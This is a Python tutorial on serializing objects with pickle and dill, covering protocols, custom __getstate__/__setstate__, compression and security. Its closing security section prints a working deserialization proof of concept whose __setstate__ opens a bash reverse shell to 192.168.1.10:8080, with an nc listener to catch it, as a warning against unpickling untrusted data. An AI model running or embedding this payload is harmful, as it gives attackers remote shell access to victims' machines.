Table of Contents
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding:Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process calledserialization, which is fully supported by the standard library thanks to the Pythonpickle
module.
In this tutorial, you’ll learn:
pickle
modulepickle
module to serializeobject hierarchiesLet’s get pickling!
Free Bonus:5 Thoughts On Python Mastery, a free course for Python developers that shows you the roadmap and the mindset you’ll need to take your Python skills to the next level.
Theserialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to asmarshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is calleddeserialization orunmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three differentmodules in the standard library that allow you to serialize and deserialize objects:
In addition, Python supportsXML, which you can also use to serialize objects.
Themarshal
module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the.pyc
files you get when the interpreterimports a Python module. So, even though you can usemarshal
to serialize some of your objects, it’s not recommended.
Thejson
module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose theJSON format: It’shuman readable andlanguage independent, and it’s lighter than XML. With thejson
module, you can serialize and deserialize several standard Python types:
The Pythonpickle
module is another way to serialize and deserialize objects in Python. It differs from thejson
module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
Note: From now on, you’ll see the termspickling andunpickling used to refer to serializing and deserializing with the Pythonpickle
module.
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
Don’t use themarshal
module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.
Thejson
module and XML are good choices if you need interoperability with different languages or a human-readable format.
The Pythonpickle
module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go withpickle
.
pickle
ModuleThe Pythonpickle
module basically consists of four methods:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference betweendump()
anddumps()
is that the first creates a file containing the serialization result, whereas the second returns a string.
To differentiatedumps()
fromdump()
, it’s helpful to remember that thes
at the end of the function name stands forstring
. The same concept also applies toload()
andloads()
: The first one reads a file to start the unpickling process, and the second one operates on a string.
Consider the following example. Say you have a custom-defined class namedexample_class
with several different attributes, each of a different type:
a_number
a_string
a_dictionary
a_list
a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in anothervariable, restoring an exact copy of the previously pickled class:
# pickling.pyimportpickleclassexample_class:a_number=35a_string="hey"a_list=[1,2,3]a_dict={"first":"a","second":2,"third":[1,2,3]}a_tuple=(22,23)my_object=example_class()my_pickled_object=pickle.dumps(my_object)# Pickling the objectprint(f"This is my pickled object:\n{my_pickled_object}\n")my_object.a_dict=Nonemy_unpickled_object=pickle.loads(my_pickled_object)# Unpickling the objectprint(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
In the example above, you create several different objects and serialize them withpickle
. This produces a single string with the serialized result:
$pythonpickling.pyThis is my pickled object:b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'This is a_dict of the unpickled object:{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
The pickling process ends correctly, storing your entire instance in this string:b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
After the pickling process ends, you modify your original object by setting the attributea_dict
toNone
.
Finally, you unpickle the string to a completely new instance. What you get is adeep copy of your original object structure from the time that the pickling process began.
pickle
ModuleAs mentioned above, thepickle
module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that thepickle
module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols that the Pythonpickle
module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.
To identify the highest protocol that your interpreter supports, you can check the value of thepickle.HIGHEST_PROTOCOL
attribute.
To choose a specific protocol, you need to specify the protocol version when you invokeload()
,loads()
,dump()
ordumps()
. If you don’t specify a protocol, then your interpreter will use the default version specified in thepickle.DEFAULT_PROTOCOL
attribute.
You’ve already learned that the Pythonpickle
module can serialize many more types than thejson
module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such asdill
.
Thedill
module extends the capabilities ofpickle
. According to theofficial documentation, it lets you serialize less common types likefunctions withyields,nested functions,lambdas, and many others.
To test this module, you can try to pickle alambda
function:
# pickling_error.pyimportpicklesquare=lambdax:x*xmy_pickle=pickle.dumps(square)
If you try to run this program, then you will get an exception because the Pythonpickle
module can’t serialize alambda
function:
$pythonpickling_error.pyTraceback (most recent call last): File "pickling_error.py", line 6, in <module> my_pickle = pickle.dumps(square)_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Now try replacing the Pythonpickle
module withdill
to see if there’s any difference:
# pickling_dill.pyimportdillsquare=lambdax:x*xmy_pickle=dill.dumps(square)print(my_pickle)
If you run this code, then you’ll see that thedill
module serializes thelambda
without returning an error:
$pythonpickling_dill.pyb'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'
Another interesting feature ofdill
is that it can even serialize an entire interpreter session. Here’s an example:
>>>square=lambdax:x*x>>>a=square(35)>>>importmath>>>b=math.sqrt(484)>>>importdill>>>dill.dump_session('test.pkl')>>>exit()
In this example, you start the interpreter,import a module, and define alambda
function along with a couple of other variables. You then import thedill
module and invokedump_session()
to serialize the entire session.
If everything goes okay, then you should get atest.pkl
file in your current directory:
$lstest.pkl4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Now you can start a new instance of the interpreter and load thetest.pkl
file to restore your last session:
>>>globals().items()dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])>>>importdill>>>dill.load_session('test.pkl')>>>globals().items()dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])>>>a1225>>>b22.0>>>square<function <lambda> at 0x10a013a70>
The firstglobals().items()
statement demonstrates that the interpreter is in the initial state. This means that you need to import thedill
module and callload_session()
to restore your serialized interpreter session.
Note: Before you usedill
instead ofpickle
, keep in mind thatdill
is not included in the standard library of the Python interpreter and is typically slower thanpickle
.
Even thoughdill
lets you serialize a wider range of objects thanpickle
, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even fordill
.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and toreinitialize the connection after the object is deserialized.
You can use__getstate__()
to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override__getstate__()
, then the default instance’s.__dict__
will be used.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with__getstate()__
:
# custom_pickling.pyimportpickleclassfoobar:def__init__(self):self.a=35self.b="test"self.c=lambdax:x*xdef__getstate__(self):attributes=self.__dict__.copy()delattributes['c']returnattributesmy_foobar_instance=foobar()my_pickle_string=pickle.dumps(my_foobar_instance)my_new_instance=pickle.loads(my_pickle_string)print(my_new_instance.__dict__)
In this example, you create an object with three attributes. Since one attribute is alambda
, the object is unpicklable with the standardpickle
module.
To address this issue, you specify what to pickle with__getstate__()
. You first clone the entire__dict__
of the instance to have all the attributes defined in the class, and then you manually remove the unpicklablec
attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain thec
attribute:
$pythoncustom_pickling.py{'a': 35, 'b': 'test'}
But what if you wanted to do some additional initializations while unpickling, say by adding the excludedc
object back to the deserialized instance? You can accomplish this with__setstate__()
:
# custom_unpickling.pyimportpickleclassfoobar:def__init__(self):self.a=35self.b="test"self.c=lambdax:x*xdef__getstate__(self):attributes=self.__dict__.copy()delattributes['c']returnattributesdef__setstate__(self,state):self.__dict__=stateself.c=lambdax:x*xmy_foobar_instance=foobar()my_pickle_string=pickle.dumps(my_foobar_instance)my_new_instance=pickle.loads(my_pickle_string)print(my_new_instance.__dict__)
By passing the excludedc
object to__setstate__()
, you ensure that it appears in the.__dict__
of the unpickled string.
Although thepickle
data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it withbzip2
orgzip
.
Tocompress a pickled string withbzip2
, you can use thebz2
module provided in the standard library.
In the following example, you’ll take astring, pickle it, and then compress it using thebz2
library:
>>>importpickle>>>importbz2>>>my_string="""Per me si va ne la città dolente,...per me si va ne l'etterno dolore,...per me si va tra la perduta gente....Giustizia mosse il mio alto fattore:...fecemi la divina podestate,...la somma sapienza e 'l primo amore;...dinanzi a me non fuor cose create...se non etterne, e io etterno duro....Lasciate ogne speranza, voi ch'intrate.""">>>pickled=pickle.dumps(my_string)>>>compressed=bz2.compress(pickled)>>>len(my_string)315>>>len(compressed)259
When using compression, bear in mind that smaller files come at the cost of a slower process.
pickle
ModuleYou now know how to use thepickle
module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Pythonpickle
module: It’s not secure. Do you remember the discussion of__setstate__()
? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is tonever unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to preventman-in-the-middle attacks, it’s a good idea to use libraries such ashmac
to sign the data and ensure it hasn’t been tampered with.
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
# remote.pyimportpickleimportosclassfoobar:def__init__(self):passdef__getstate__(self):returnself.__dict__def__setstate__(self,state):# The attack is from 192.168.1.10# The attacker is listening on port 8080os.system('/bin/bash -c"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')my_foobar=foobar()my_pickle=pickle.dumps(my_foobar)my_unpickle=pickle.loads(my_pickle)
In this example, the unpickling process executes__setstate__()
, which executes a Bash command to open a remote shell to the192.168.1.10
machine on port8080
.
Here’s how you can safely test this script on your Mac or your Linux box. First, open theterminal and use thenc
command to listen for a connection to port 8080:
$nc-l8080
This will be theattacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change theIP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is192.168.1.10
.
By executing this code, the victim will expose a shell to the attacker:
$pythonremote.py
If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:
$nc-l8080bash: no job control in this shellThe default interactive shell is now zsh.To update your account to use zsh, please run `chsh -s /bin/zsh`.For more details, please visit https://support.apple.com/kb/HT208050.bash-3.2$
So, let me repeat this critical point once again:Do not use thepickle
module to deserialize objects from untrusted sources!
You now know how to use the Pythonpickle
module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
In this tutorial, you’ve learned:
pickle
modulepickle
module to serializeobject hierarchiesWith this knowledge, you’re well equipped to persist your objects using the Pythonpickle
module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.
If you have any questions, then leave a comment down below or contact me onTwitter!
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding:Serializing Objects With the Python pickle Module
🐍 Python Tricks 💌
Get a short & sweetPython Trick delivered to your inbox every couple of days. No spam ever. Unsubscribe any time. Curated by the Real Python team.
AboutDavide Mastromatteo
Developer and editor of “the Python Corner". Blood donor, Apple user, Python and Swift addicted.NFL, Rugby and Chess lover. Constantly hungry and foolish.
» More about DavideMasterReal-World Python Skills With Unlimited Access to Real Python
Join us and get access to thousands of tutorials, hands-on video courses, and a community of expert Pythonistas:
MasterReal-World Python Skills
With Unlimited Access to Real Python
Join us and get access to thousands of tutorials, hands-on video courses, and a community of expert Pythonistas:
What Do You Think?
What’s your #1 takeaway or favorite thing you learned? How are you going to put your newfound skills to use? Leave a comment below and let us know.
Commenting Tips: The most useful comments are those written with the goal of learning from or helping out other students.Get tips for asking good questions andget answers to common questions in our support portal.
Keep Learning
Related Topics:intermediatepython
Recommended Video Course:Serializing Objects With the Python pickle Module
Related Tutorials:
Already have an account?Sign-In
Almost there! Complete this form and click the button below to gain instant access:
5 Thoughts On Python Mastery